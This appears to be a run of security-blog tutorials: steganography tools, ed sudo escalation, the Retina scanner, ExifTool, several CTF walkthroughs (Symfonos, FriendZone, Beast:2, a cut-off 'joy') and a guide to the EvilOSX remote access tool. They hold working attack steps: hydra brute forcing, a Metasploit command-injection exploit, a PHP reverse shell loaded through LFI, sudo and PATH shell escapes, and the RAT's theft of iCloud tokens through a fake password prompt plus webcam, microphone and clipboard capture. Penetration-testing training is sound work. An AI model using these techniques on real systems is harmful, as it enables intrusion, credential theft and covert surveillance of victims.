Effective communication is stegnography. At first you can encrypt and hide a private file inside a picture of another file type before sending it to somebody else. The likelihood of being intercepted will reduce. If you send any encrypted file to someone the other person will try to decrypt it in many ways and possibly, he will be able to do so. But in this case, it will reflect like a normal image and the other person will have no hint that what can be there on the other side of the picture. So, it is always a better and safe way of communication for those organisations where they want to protect their selves from these kinds of attacks.

So, let’s start and see how it works.

Audio Based Steganography

First, we will install a software named deep sound which is meant to convert all our audio files to some other format files. For installation please visit the link given below

https://deepsound.en.uptodown.com/windows

Conceal Approach: Now open the application and click on open carrier files and select a mp3 file behind which you want to conceal the original file.

Here we have selected an audio file behind which we will hide the data as we have done.

After selecting the file, we will now click on add secret file and give any file here which we want to conceal. Here we have opted for a document file.

Here you can further add one more extra security layer which is encoding by putting a password to the file. As you can see that we have given 123 as a password without which it won’t be possible for the other person to open the file.

The file is created successfully.

Now we can share this mp3 file with the other person to continue the hidden communication in the network.

Reveal Approach: The person also needs to open this with same password which we had given for encoding. As the other person enters the password, he will be able to see the concealed content of the file by clicking on extract files.

As the other person enters the password, he will be able to see the concealed content of the file by clicking on extract files and the doc file is extracted successfully.

So, by this tool we have successfully concealed our doc file behind the mp3 file.

Image based steganography

Let’s now hide some text file behind an image file. So, we have installed next tool which is OpenStego.

Conceal Approach: we will first select the doc file which we want to hide after that we will add the image file behind which we will conceal the doc file and then we will choose a password and the concealed file is created.

Reveal Approach: Now we will extract the doc file by adding the image and then giving the right password and we have extracted the doc file.

Video based Steganography

Now let’s see how we can hide anything behind a Video file. For this we will install the tool Our secretfrom the link given here.

https://oursecret.soft112.com/

Once it is downloaded successfully. We will now be trying to conceal a doc file behind a video file.

Let’s start.

Hide: So first we will select a video which went to send. So, by clicking on select a carrierfile we will choose our video and then that file which we want to hide and then giving it a password and click on hide and our new file is created.

Unhide: Now we will try to open this file with the same tool for unhiding and it will ask for the password. Once you will enter the password, we will get the concealed file here.

Text based Steganography

Now we are moving towards a new idea of steganography which is white spacesteganography. In this kind of steganography, we will hide text behind the text which will be not possible for anyone to judge. For this we will visit a website

www.spammimimc.com

Conceal Approach: Here we will click on encode and add the text which you want to hide and click on encode.

As you clicked on encode you will see that a new text encoded file is created.

Reveal Approach: To decode this encoded text, we will copy this text and paste it in the box given and click on decode.

And finally, you will get the message which was hidden behind that.

Another Method

Conceal Approach: That’s not all! We can also send this message as a excel file which is hard to detect for anyone. To use this feature, we will click on “encode as a spreadsheet” and enter the text which you want to conceal and click on encode.

Then this generate a new excel file to conceal our “secret message” behind its record.

When we open this excel file it seems a very normal excel file by which no one will get to know the real message behind that.

Reveal: But as we know that there is a hidden file behind this so we will decode this. So first click on decode fake spreadsheet.

Now paste the sheet which we want to decode in the column and click on decode.

Now you will get the real hidden message which was there behind this excel file as we got successfully.

So, it’s very clear that there are several ways of sending safe secret messages by the art of steganography.

Linux for Pentester: ed Privilege Escalation

Here in this article we are going to introduce a line-oriented text editor command i.e. “ed” which is used to generate, display, alter and operate text files.All ed commands operate on whole lines or ranges of lines; e.g., the “d” command deletes lines; the “m” command moves lines, “t” command copy the lines and so on therefore, now we will check that how we can successfully execute our task of Privilege Escalation by accomplishing all these significant of “ed” command.

Table of Content

Overview to ed

· Summary to ed

· Primary Action attained using ed

Abusing ed

· SUDO Lab setups for privilege Escalation

· Exploiting SUDO

Summary to ed

ed command in Linux is used for initiation of the “ed text editor” which is a line-based text editor. Its minimal interface tendency makes it less complex for working on text files. It helps user to perform many operation like creating, editing, displaying and manipulating the files.

Editing is done in two distinct modes: “command and input”. In the “command” mode “ed” reads command from the standard input and execute to manipulate the contents of the editor buffer whereas when an input command, such as ‘m’ (move), ‘d’ (delete), ‘t’ (copy) or ‘c’ (change), is given, ed enters for its “input mode”.

It is the oldest editor which was developed in 1969 in the UNIXand is succeeded by vi and emacs text editor.

Now type its help command to know more about “ed”.

ed --help

Fundamental activities achieved by “ed”: As we know “ed” does many operation so now we will go through to its entire functionality one by one.

Initializing file with ed: At initial phase the terminal space will seems to be like as below image when command is run .By default, the editor creates an empty buffer to write, similar to the way any other command line based editor works when you invoke it without a file name.

Now we will start to create a text file that contains some text within it. For doing so very first we will press 'a' before entering anything to the file and once we accomplished our task of writing we will enter a period (.) to signify this to the editor.

Note:The main thing that needs to be remember is to use 'a' (initial) and '.' (Final) as the ways to enter and exit the insert mode. Now, to save the buffer in a file, use 'w' followed by a file name of own choice which helps to save file by desired name as well as will also display the total no. of bytes that a file contains, and then 'q' to quit the editor.

w info.txt

cat info.txt

For the confirmation of your created file i.e. whether it has been created or not you can recheck it by using “cat” command.

Edit the file with ed: Now, in case you need to edit the same file again, then it can simply done by passing the name of the file as argument to the ed command, and then following the same procedure as discussed above.

Here in below image I’m adding one more line to my file “info.txt” which I have created above by following same process.

ed info.txt

Note: Every time we need to use ‘a’, ‘.’, ‘w’, ‘q’command whenever we use any option of ed command.

Change any specific line:Till now we have learnt basic editing using ed, now let's move ahead to discuss more editing aspects by using ed. For example, if we want to make changes in a specific line then how we can attain that operation using ed.

Here in below image it has been shown how we can print any particular line using argument ‘p’ and ‘n’

When we type ‘p’it gives us the current line at which the control is currently, while on using ‘n’ it gives us the line number as well.

ed info.txt

So after typing ‘n’ we simply need to mention that line no. for which we want alteration. By default ‘n’ displays the last line of the file so after that you can type the line no. as per your search.

Once you achieved the line where you want to make change, then you can enter'c' to change that line by typing the text again. For example, I have changed the 5th line which is the last line of my file, by adding some more detail to it. To recheck my modification I have read my file by using ‘cat’ command and will save file by following same process.

cat info.txt

Display error message by the use of ed: When you type something which ed can't understand, it displays a question mark (?) by default. To know more about where you have mistaken ed provides a very helpful option i.e. ‘h’.

ed info.txt

As from below screenshot it can be clearly understood that when I have used ‘b’ option it gave me (?) which is the symbol of error and while typing ‘h’ ed has displayed the error message as unknown command for option ‘b’.

Copy and move operation by ed: Apart from all above discussed function ed also gives option for copy and paste a line at some other location, in this case we use ’t’ command to copy the line and ‘m’ to move any line. You need to precede’t’ with the line number to which you want to copy, and append the destination line number. For example, as in below image I have copied 5th line to position 0 and will save changes.

ed info.txt

5t0

cat info.txt

In above mentioned command 5 is representing to the line which need to copy and 0 is representing to the line no. for where it need to be copy.

Note: One can also use ‘m’ instead of ‘t’ if he/she wants to move the line to other place.

Search operation using ed: Searching for any line by its keyword can be easily done by ed. For doing so first we will use “-p%” followed by ed which will prompt you further for your search mission. After that to search forward, enter / followed by the search keyword. The moment at which you press enter, the editor will display the first line (containing the keyword) it encounters. You can run that command again to continue searching

ed -p% info.txt

%/misconfiguration

%/Linux

Here in below image ed has printed only those line as output which consist search keywords i.e. misconfiguration and Linux.

Exploiting ed

Sudo Rights Lab setups for Privilege Escalation

Now we will start to perform privilege escalation for “ed”. For doing so we need to set up our lab of ed command with administrative rights. After that we will check for the “ed command” that what effect it has after getting sudo rights and how we can use it more for privilege escalation.

It can be clearly understood by the below image in which I have created a local user (test) who own all sudo rights as root.

To add sudo right open /sudoers file and type following as user Privilege specification.

test All=(root) NOPASSWD: /bin/ed

Exploiting Sudo rights

Now we will start exploiting ed service by taking the privilege of sudoer’s permission. For this we need sessions of victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.

Very first we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

ssh test@192.168.1.31

Then we look for sudo right of “test” user (if given) and found that user “test” can execute the ed command as “root” without a password.

sudo -l

Now after knowing the fact that test user attains sudo rights so, taking this benefit here we can use ed command to access empty buffer to call bash/sh shell, with higher privileges if permitted on sudo.

Conclusion: Hence we have efficaciously exploited “ed” by attaining its functionality after granting higher privilege.

In this article, we will learn how to use retina, “a vulnerability scanner” to our best of advantage. There are various network vulnerability scanners, but Retina is industry’s most powerful and effective vulnerability scanners. This network vulnerability scanning tool gives vulnerability assessment experience and generates full brief network vulnerability report.

Table of content

Introduction to Retina
Scanning process
Working of Retina
Network scanning with retina
Conclusion

Introduction to Retina

Retina network scanner allows you to scan multiple platforms. It also provides you with automatic fixes and the ability to create your own audits. It works against all the critical vulnerabilities hence, allowing you to decure you network properly. As it keeps updating its database at the beginning of every session, it is pretty reliable. Retina permits you to scan parallelly by using it’s queuing system to scan up to 256 targets at the same time. You can also execute majority of scans without administrative rigths. It also allows you to perform custom audit scans to inhance you internal security policies. Retina Network Security Scanner is a outstanding solution designed to discover profile and assess all assets deployed on an organization's network. With Retina Network Security Scanner, customers can efficiently identify, prioritize and remediate vulnerabilities such as missing patches and configuration weaknesses.

Scanning Process

For scan to begin the specific details to retina through its GUI. As soon as the scanner will receive the scanning details, it will begin the auditing process. An audit scan covers the following :

· Targeting : builds a scan list from the address group and discovery options

· Port scanning : finds out all the open, closed and filtered ports

· Detecting OS : lets you know about the OS on the target system

· Auditing : accesses vulnerabilities of each port and their respective services.

Working of Retina

First Retina recovers the list of IPs that need to be filtered then it builds and composes its target list to the eeye_ groups table. The work list contains the work to begin and halt data. Retina at that point starts running the scan. Once targets are filtered, then the completed passages are evacuated from the line record. In case it’s powered down for any reason, this guarantees that a filter will total. At the conclusion of the check, the scanner composes Completed to the eeye_groups table within the filter comes about database (RTD). Suppose the client prematurely ends the work, then the scanner composes Prematurely ended to that table.

Network scanning with Retina

We have downloaded the Retina Vulnerability Scanner from the Offical Site. After Downloading the correct version with respect to our machine, we have installed the scanner through the setup. It is a fairly simple setup to install. After installation, we will run the application which results us by providing 3 tabs, i.e. “Audit, Remediate and Report”. First we will work upon the Audit tab, inside which we have selected “Single-use” after that we are scanning an individual target in Target Type. We will use the IP Address for the target. In the case of “Multiple-use”, we can use a specific IP range too.

After selecting the Target, we must select the port that we want to scan, we have multiple options like, all ports, Common Ports, Discovery Ports, and others. In our scenario we have selected “All ports”.

After selecting the ports, it’s time to select the type of audit, which we want to perform on our target machine. This includes many types with an option to modify. We can craft a personalized audit with the help of options provided. We selected “All Audits”. This took more time in performing the scan, but the personalized scan will take less time.

Now, we got the Options. Here, we have choice to select some additional functionality that we can include in our scan. This includes, OS Detection, Reverse DNS, NetBIOS Name, MAC Address and others. We can also provide the Number of users that we want to enumerate.

Now, we run the scanner, by clicking on the “Scan” button. After hitting the Scan button, the scan starts running and we can see the details of the Scan in Active tab of Scan Job Section. Here we can see that name of the server “Metasploitable” and the Operating System is “Ubuntu 8.04”. We also can see other details of the scan.

Now we move on to the “Remediate Tab”, here in the Configuration Section we can see the Vulnerabilities that were found and we have the option to sort out the Vulnerabilities based on the Name, Category and other criteria. Also, in case of multiple devices, we can generate report sorted by the individual IP address

Next, we will move towards the “Report Tab”. In this we can select more option to refine our report. This includes sections like: Scan Summary, Vulnerabilities by Category, Top Vulnerabilities, Top Open Ports etc. Apart from this we can also select the type of report that we want. In the below image I have chosen an “Executive Report”.

As you can see from below image we have gained with multiple choices to choose from the Report Type that listed us with many options such as: “Summary Report, Vulnerability Export Report, Access Report, Dashboard Report, etc.” This is one of the most vital features that gives Retina an edge in the market of Vulnerability Scanners.

Here, in our practical we have chosen ‘Executive’ report type as it is the one which is most commonly use in the IT industry. You can see in the above image that, report will cover all the major sections which are scan summary, top vulnerabilities, and open ports and all the important information that is required.

Once the report is generated, you can open it in the browser as shown in the image below. It will record date and time of the scans and report for you too.

Everything in the report will be catalogued for your convenience and the title will be shown in the index as shown below. It will start from showing all the top vulnerabilities in all the way to the bottoms ones.

First in the report is “scan metrics” which gives the brief overview of the scan. This overview will inform you about how many vulnerabilities are exploitable and will also rate the vulnerabilities for you from low to high. It will also show you the time taken by the scan with the exact start and end time.

And further, it will categorise all the vulnerabilities with their basic information just as it’s shown in the image below:

Then it will show you the top 20 vulnerabilities with their name, rise and information along with their count.

Further, it will show you bottom 20 vulnerabilities with their names and other information.

Then, as catalogued it will go on to showing you the top twenty open ports with their names, port number and service. It also includes count which helps to tell the total no. of ports that are running in same service.

And then it tells you about the operating system on the target machine. Which is quite necessary information as it helps you to formulate attack or security policy.

Conclusion

Since the launch of Retina Vulnerability Scanner in 1998, the Beyond Trust Network states that it has sold over 10,000 copies of the Scanner. The Retina Vulnerability Scanner is one of the scanners that have an edge over other scanners as it continuously monitors and improves their scanner with the enterprise security posture. It is the most sophisticated vulnerability assessment solution on the market that is available as an standalone application, a host-based option, or as part of the Retina CS enterprise vulnerability management solution, Retina Network Security Scanner enables you to efficiently identify IT exposures and prioritize remediation enterprise-wide

Today we are going to take another CTF challenge from the series of Symfonos. The credit for making this VM machine goes to “Zayotic” and it is another boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

1. Scanning

· NMAP

2. Enumeration

· Enum4Linux

3. Exploitation

· Smbclient

· Hydra

· Msfconsole

4. Privilege Escalation

· Exploiting Sudo rights

Walkthrough:

Scanning:

Let’s start off with the scanning process. This target VM took the ip address of 192.168.1.102 automatically from our local wifi network.

Then we used Nmap for port enumeration. We found that port 21,22, 80,139 and 445 are open.

nmap –p- –A 192.168.1.102

Enumeration:

As port 80 is open, we tried to open the IP address in our browser but we didn’t find anything useful on the webpage. We also tried dirb and other directory brute forcing tools but couldn’t find anything.

For further enumeration we used Enum4Linuxtool and found some useful information.

We found a shared directory named anonymous.

To confirm our finding we took the help of smbclient with empty password to list the shared resources of the target machine and got the same result.

Inside the anonymous directory there is another directory named backups. Inside the backups directory we got a log.txt file. So we downloaded the same file with get command.

smbclient –L 192.168.1.102

smbclient //192.168.1.102/anonymous

cd backups

get log.txt

After opening the log.txt file in our local machine we got a username aeolus.

Exploitation:

So far we have got a username aeolus, so we tried to bruteforce it with hydra and after a long wait we successfully got a password sergiotaemo.

hydra –l aeolus –P /usr/share/worlists/rockyou.txt 192.168.1.102 ssh

Now we have a username and a password and we already know that there ssh service running on the target machine. We tried to ssh login the target using msfconsole and were successfully able to do so.

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.1.102

set username aeolus

set password sergiotaemo

exploit

From the ifconfig command we got a little hint that the target machine is listening on the localhost ip only.

So we used netstat command to check for the ip address and ports the target machine is listening on and found that web service (8080) is allowed for localhost only.

So what we did is we used port forwarding to access the port 8080 of the target.

netstat

portfwd add -l 1234 –p 8080 –r 127.0.0.1

After that we were able to access the webservice running on port 8080. On the webpage we found it is running an LibreNMS web application.

We searched for any exploit available for the LibreNMS application in metasploit and found one command injection exploit available.

Using this exploit we were able to get a meterpreter session of the user LibreNMS.

search librenms

use exploit/linux/http/libre_addhost_cmd_inject

set rhost 127.0.0.1

set rport 1234

set lhost 192.168.1.103

set username aeolus

set password sergiotaemo

exploit

Privilege Escalation:

To get to the root shell we checked for the sudoer permissions for the librenms user and found that this user can run mysql command with no password. So we leveraged this to our advantage and run /bin/sh to get the root shell.

Once we got the root shell we traversed to the root directory and opened the proof.txt file to complete the challenge.

sudo –l

sudo mysql –e ‘\! /bin/sh’

cd /root

cat proof.txt

In this article, we will learn to use EvilOSX tool which is a Remote Administrator tool (RAT ) for initialising foothold on MacOS/OSX like platform . It can dramatically increase access in a matter of seconds.

Table of Content

·         Introduction
·         Installation
·         Usage in Exploitation
·         Usage in Post-Exploitation

· System Info

· Webcam

· Retrieve iCloud auth tokens

· Microphone

· Clipboard

EvilOSX is an evil RAT (Remote Administrator Tool) designed to work upon macOS / OSX Platforms. It was developed by Marten4n6. Its backbone is famous Empire Framework Project. This project can be modified to be used on Rubber Ducky. This toolkit is fully packed with features. It was designed on the module system that made the debugging, improvements and addition of other modules easy. Also being developed in python it provides easy to be run across different attacking platforms.

Installation

The installation of the EvilOSX RAT on the Attacker machine, which in our case in Kali Linux is pretty simple. To begin with we will visit the EvilOSX GitHub Page. After gettingthe git link, we are going to clone the EvilOSX to our attacker machine using the git clone command.

git clone https://github.com/Marten4n6/EvilOSX.git

After cloning the EvilOSX, we traversed in the newly created directory created with the name of EvilOSX. Now, the tool has some predefined requirements that are required in order to make the tool function properly. Being a python developed tool, we will use the “pip” to install those requirements. These requirements are given by the author in the form of a text file which we used to install them.

pip install -r requirements.txt

Usage in Exploitation

Since we have successfully installed all the predefined requirements, it time to run this tool and gain control over some macOS devices. Now to exploit, we need a payload. To create this payload, we will use the start.py file with the builder parameter.

python start.py --builder

After running the script, it asked us to enter following information:

· the Server host, here we entered our Attacker Machine IP Address (Kali Linux).

· Next, it asked us for a port, this can be any random port.

· After this, we are asked for the location of the location of the payload.

· Next, we have to choose if we want EvilOSX to work upon the rubber ducky or not. Enter 0 for otherwise.

· Furthermore, we are asked to choose the loader, leave it default.

· After that we are asked to name the payload so as phish the user.

After all these choices, a launcher is created as shown in the image given below.

Now we can use any method to share this launcher or payload to the victim. In our case we used a python HTTP server to get this file to the victim system. This file is downloaded on the victim system and then after providing the proper permissions the payload is executed as shown in the image given below.

chmod 777 Launcher-39q1q9.py

./Launcher-39a1a9.py

While we are executing the Launcher on the victim, we have to perform some actions on the attacker machine simultaneously. We are going execute the start.py again but this time in the CLI mode. Here we have to specify the port that we used while creating the launcher as the parameter as shown in the image.

python start.py –cli --port 4545

Post-Exploitation

After running the start.py script in the previous steps simultaneously with the launcher on the victim machine, we have successfully infiltrated the Victim MacOS system. The terminal converts in a framework as shown in the image. We can configure a page to shown upon the running. Type in help to show a list of working commands. We can see the list of active bots by using the command bots. To establish a connection to a bot, use connect command followed by the number which in this case is 0. To see the list of available modules we use modules command.

To use a module, just type in “use” followed by the module name. As there are a bunch of available modules, we are demonstrating a bunch of them here for reference. You can try them all at your convenience.

System Info

To get a brief summary of the system, we can use the get info module. This gives us the System Version, Model of the MacOS device. We also get the Battery status in case it is a Laptop. We have the name of the Wi-Fi Network it is connected to. It also tells us the privileges the current account has as well as the status of the FileVault.

Webcam

Now, we will try to grab a snap from the webcam of the MacOS device. To do this we will need to use the webcam module. It gives us a warning that there a green LED will show near the camera.

We have successfully captured a snap from the victim’s webcam as shown in the given image.

Retrieve iCloud auth tokens

We can extract the iCloud Authentication that contains information related to the AppleID linked to the device. However, this will first show a prompt on the victim system.

After agreeing to continue, a prompt will pop us as show in the image given below. This is masquerading as a genuine prompt that will spoof the victim and make him enter the password.

After the victim enters password, we will successfully capture the mail ID liked to the device as well as the access tokens as shown in the image given below.

Microphone

We can also capture the audio from the victim device using the microphone module. After running the command use microphone, we are asked to enter the time in seconds to record the audio from the microphone of the victim device and also the name of the service that would show up in the verification prompt.

Here we entered 5 seconds, and we left the name of service to be blanked which made the RAT to take it as random sting as shown in the given image. A permission prompt pops up on the victim system asking for the permission to access the microphone.

After allowing the we have the recorder audio in the mp3 format saved on out attacker machine in the tmp directory.

Clipboard

We can also sniff the clipboard data from the victim machine. To do this we will have to use the clipboard. This will start the sniffer on the victim machine for the specified time in seconds. After starting the sniffer, any text that the victim will copy can be viewed as shown in the image given below.

Conclusion

EvilOSX has a lot of uses, and the attention to detail in automating certain exploits makes it a great dedicated tool for OSX. The ease with which it works and attacks is remarkable, we can launch phishing attack to escalate privileges or trick a user into letting us deeper into the system. It’s a great tool and amazing to use as it traverses itself to connect apple devices.

In this article, we’ll discover various methods toread, writeand manipulatethe meta-data information recorded in a variety of file types. In order to achieve this, we’ll be using a tool known as “ExifTool”. EXIF is an acronym for Exchangeable Image File Format and it is a standard for the inclusionof metadata in certain file types.

Table of Content

· Introduction to ExifTool

· Installation

· Usage of exiftool

o Extract the Common Meta-Data Information

o Extract the Specific Meta-Data Information

o Extract GPS Co-ordinates

o Extract Thumbnail Image

o Extract metadata using specific keywords

· ExifTool’s Verbose Mode

· Writing the Meta-Data Information

· Removing Meta-Data Information

· Saving outputs

o In HTML file

o In Text File

· Extracting ExifData from a Video file

Introduction

ExifTool is developed by Phil Harvey. It is a platform-independent Perl library coupled with a full-featured command-line implementation for reading, writing and manipulating the metadata across a broad range of files, particularly the JPEG images. This metadata may comprise a bunch of information such as thecamera make, file type, permissions, file size etc., though it further offers more details about the photograph, like the exposure, the shutter speed and whether the flash fired or not. ExifTool probably givesus the simplestway to extract metadata from files, as it is free and an open-source program.

Installation

Exiftool is quite easy to deploy. It's just about hitting our Linux terminal and cloning the tool from GitHub.

git clone https://github.com/exiftool/exiftool.git

In addition, we need to install the necessary package for it.

sudo apt-get install libimage-exiftool-perl

So, we've mounted the tool in our system. Let’s take a closer look at it.

Usage of Exiftool
To extract the entire metadata of a file, we just need to execute the given below command:
exiftool

From the below image, you can now notice that we’ve got all the information drawn from our image file from the very basic to advance.

However, if we need to capture the ids along with exif tags in the Hexa-Decimal format, though we need to run the following command:

exiftool -H

From the below image, we can see that there is a lot of information stored within these Exif tags.

Extract the Common Meta-Data Information
Now execute the given below command which will provide us the output of the most common Exif tags of the image file.

exiftool –common

Extract the Specific Meta-Data Information
We can list a particular meta information of our image file by simply executing the command given:

exiftool -tagname -tagname

From the below image, we get our desired output displayed along with their respected tagnames in a list type format.

Extract GPS Co-ordinates
The photographs we capture using our smartphones or camera have GPS coordinates embedded as metadata in the image files. To obtain this, we just need to fire the command given below:

exiftool | grep GPS

Here we got the GPS Position, now just copy and paste this complete coordinate information over Google Maps and we will get the exact location of the camera when the picture was taken.

Extract Thumbnail Image
Thumbnails are the original preview images basically compressed. These are just created to open the original images more quickly and act as place holders to them. In order to extract these thumbnail images, we just need to execute the following command:
exiftool -ThumbnailImage (filename) > (Outout filename)
Here we can see that the thumbnail.jpg file is extracted from the test.jpg image.

Extract metadata using specific keywords
The following command will assist us to extract the metadata information associated with some specific keywords.
exiftool “-*keyword*”
From the below picture, we can see that our fired command displays all tags with names containing the word "Image" from the file.

ExifTool’s Verbose Mode
Verbose mode generates extended information i.e. when we add [-v] to the exiftool command it will display us the comprehensive data about the process that it is performing.
exiftool -v

Writing the Meta-Data

ExifTool provide us a great power to write most of the information on the EXIF tags, that anyone might want to alter, but some tags are protected because they describe the image's physical characteristics that we can't change with ExifTool, such as compression. Also, other tags like the GPS, the MakerNotes, these information can be edited.

To manipulate the exif data we need to execute the following command:

exiftool -Make= “HackingArticles”

Here we can see that the information stored in the “Make” tag is replaced from “OPPO” to “HackingArticles”. While writing the information, ExifTool’s script automatically preserves the original file by adding "_original" to the end of file name.

Removing Meta-Data Information
We have only extracted or manipulated the exifdata so far, but what if we want to remove or delete all the metadata from an image file. Just execute the following below command, let's see how this works:
exiftool -all=
It shows 1 image files uploaded. The "test.jpg" exifdata has been removed effectively. Although let's attempt to extract the metadata from "test.jpg" again, hence we’re just getting the basic information of the image and the rest is deleted.

Saving outputs in Multiple Format

1. In HTML file

We will save the ExifTool’s output in an HTML file in order to maintain the records and for better readability. To do this we will use the parameter “-h” along with the exiftool’s command and save the results in a file with .html extension.
exiftool -h (filename) > (output.html)

Here, we can see test.html file is generated. Although we just need to open it to check our exifdata output in any of our browsers.

2. In Text File

We can even export our exifdata to a text file similar to the output of the HTML. To achieve this, we simply need to execute the following commands:

exiftool (filename) > (outputexif.txt)

Further we can also monitor our output either by opening it in any of the text editors or by simply running the command:

cat

Extracting ExifData from a Video file
ExifTool not only extract metadata from the jpg file format but can also read and write in a variety of files. To know more click here.
We will now extract the entire meta-data information from a mp4 video file. To extract this, we will run the basic exiftool’s command i.e.
exiftool

Conclusion

This was Exiftool's complete usability guide as a meta-data extractor. It is user-friendly and convenient because of its simple command-line implementation. It has thus become one of the best tools to extract meta-data data from a variety of file formats.

FriendZone is a recently retired CTF VM on Hack the Box with the objective – Capture the user and root flag. Hack the Box offers a wide range of VMs for practice from beginner to advanced level and it is great for penetration testers and researchers.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of FriendZone is 10.10.10.123

Penetration Testing Methodologies

Scanning

· Nmap

Enumeration

· SMB shared Directory

· DNS Zone Transfer

· MySQL creds

Exploit

· LFI to RCE

· Capture the user flag

Privilege Escalation

· Abusing Python Library

· Capture the root flag

Walkthrough

Let’s start off with scanning with the nmap to check open ports.

nmap -sC -sV 10.10.10.123

From nmap scan we found so many ports are opened such as 22,53,80,443, 445 and several services were available and we noted the ssl certificate is registered as friendzone.red.

Enumeration

On exploring, vulnerable machine IP in the web browser, it welcomes us with following web page as shown below.

Here also I notice friendzone.red and this could be a clue for proceeding further. As per nmap scan result port 53 is open for TCP which means there may be some possibilities for DNS Zone Transfer.

I didn't find any other useful information on the home page, so I try to enumerate web directories with the help of DIRB. But this was also not worthwhile for us because the enumerated result was not valuable when further inspected.

Consequently, I switch to another enumeration service and it was a null session SMB enumeration. So, with the help of SMBmap, which is a Linux utility, we try to enumerate smb shared directories.

smbmap -H 10.10.10.123

I found two shared directories and among those /general had read only permissions and /Development has read/write both permissions. so, when we accessed /general directory, we obtained a text file named as “creds”.

smbmap //10.10.10.123/general

get creds.txt

In this file I found following credential which could be use later.

admin:WORKWORKHhallelujah@#

First, I added friendzone.red inside /etc/hosts file but didn’t found any valuable information, therefore I enumerated sub-domain by executing following command and fetch some sub-domains which could be useful in DNS zone transfer.

Host -l friendzone.red 10.10.10.123

Further I saved /administrator1.friendzone.red. in the /etc/hosts file for accessing this domain.

On the exploring administrator1.friendzone.red we got a login portal where I submitted the credential that we have found above.

So, we found another hint “/dashboard.php” which was a web directory.

On enumerating /dashboard.php we found following web page; here it gave a message “image_name param is missing”.

Therefore, we injected “default is image_id=a.jpg&pagename=timestamp” in the URL and obtain following web page where we notice timestamp, and this looked little suspicious towards LFI.

https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=timestamp

Exploiting LFI

To ensure that I try to call timestamp.php and by obtaining timestamp on the screen it was confirmed that it is vulnerable to LFI. Now let’s extend LFI to RCE to obtain shell of the host machine.

As we knew that /Development is the only directory that has read/write both permissions, hence we can inject our malicious file inside this directory and execute the backdoor by exploiting LFI to obtain reverse connection.

Then I have used pentest’s monkey php reverse shell with little modification such $lhost & $lport as backdoor that to be injected inside the host machine.

So, we connect to SMB with the help of smbclient and upload the php-reverse-shell inside /Development. Simultaneously we launched netcat listener in a new terminal to obtain reverse connection from the host machine.

smbclient //10.10.10.123/Development

Then execute the uploaded php backdoor with the privilege of LFI as shown below:

https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=/etc/Development/php-reverse-shell

As soon as we executed above URL in the browser, we have access netcat session and to obtain proper shell we import python pty one-liner and found our 1^st flag inside /home/friend.

With little more traversing I found credential for user “friend” from inside /var/www/mysql_data.conf

user=friend

pass=Agpyu12!0.213$

Privilege Escalation

So, with help of above enumerated creds we try to access ssh and luckily, we connected to ssh and try to identify weak permission file or role for escalating privileges to access root shell or root flag.

ssh friend@10.10.10.123

as I was fail to identify any sudo rights or SUID permission files, therefore I go for pspy64s to examine running process of the machine. Thus, I downloaded the script it inside /tmp directory and gave full permissions.

On running pspy64s, we notice that a python is executing by root which was surprising to us.

So, I decided to take a look what is script was doing, therefore I used cat command to read what this script is running.

cat /opt/server_admin/reporter.py

Hmmm! So, I didn’t find any useful operation is being executed by this script other than import a python library “os.py” hence I take it advantage in privilege escalation.

Taking privilege of python library, we can create a bogus python library named as os.py to call root flag through this file.

cd /tmp

echo “system (‘cat /root/root.txt > /tmp/flag’)” >> /usr/lib/python2.7/os.py

After sometime it will create write the root flag inside /tmp/flag as show in the below image. Thus, we have obtained root flag and finished this challenge.

Today we are going to take another CTF challenge Beast:2. The credit for making this VM machine goes to “Avraham Cohen” and it is a boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

1. Scanning

· NMAP

2. Enumeration

· Wireshark

3. Exploitation

· SSH

4. Privilege Escalation

· Exploiting Suid rights

Walkthrough:

Scanning:

Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.102 automatically from our local wifi network.

Then as usual we used our favorite tool Nmap for port scanning. We found that ssh is open and running two ports 22 and 65022.

nmap -p- -A 192.168.1.102

We tried to ssh the target with port 65022 and found. It working but we don’t have the username and password yet.

So our next step is to hunt the ssh username and password

Enumeration:

All we have got is ssh service enabled on the target machine and nothing else. So what we did is we started to capture traffic of the target machine using wireshark.

We tried different filters and found something useful with udp filter.

ip.addr==192.168.1.102 && udp

We checked with udp stream and two words got our attention whiteshark & whitepointer which could be the usernames for ssh.

In another captured data packet we found the password Ch@ndr!chthye$.

Exploitation:

So far we probably have got two usernames and one password.

We tried to ssh the target with both the usernames one by one but whitepointer &Ch@ndr!chthye$ combination worked for us and we were successfully able to login the target system.

After logging in we checked for sudo rights but the user was not a sudoer.

We also checked for the suid rights for any file and found /usr/bin/root has suid set.

ssh whitepointer@192.168.1.102-p 65022

find / -perm -u=s -type f 2 >/dev/null

Privilege Escalation:

To elevate to the root shell we will exploit the suid permissions of the /usr/bin/root file. Using the strings command we found root file is actually running the whoami command.

We used the path variable methodology to exploit the privileges of the root file. What we did is we created a new file named whoami indside /tmp directory and put /bin/bash inside it using echo command, then gave all privileges to it. We then exported the path.

To know more about Path Variable check our article on the same HERE

So after that once we executed the /usr/bin/root file we successfully got the root shell and then also the flag.txt as anticipated.

Cd /tmp

echo “/bin/bash” > whoami

chmod 777

export PATH=/tmp:$PATH

/usr/bin/root

Cd /root

Cat flag.txt

Today we have another CTF post, one more series of Dgitalworld.local named “joy” and the credits goes to Donavan. This is a boot to root challenge available on vulnhub you can download it from the given below link and the CTF is design for OSCP practices.

Download Link: https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

Level: Intermidate

Task: Obtain root shell

Penetration Testing Methodologies

Scannig

· Nmap

Enumeration

· FTP anonymous login

Exploit

· Exploit ftpro using Metasploit

Privilege Escaltion

· Sudo right

Walkthrough

Scanning

Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.104 automatically from our local wifi network.

Then, as usual, we used our favorite tool Nmap for port scanning. Here we found that so many ports were opened but port 21 for ftp looks more interesting to me as anonymous login was allow on the running machine for two directories /upload /download.

Enumeration

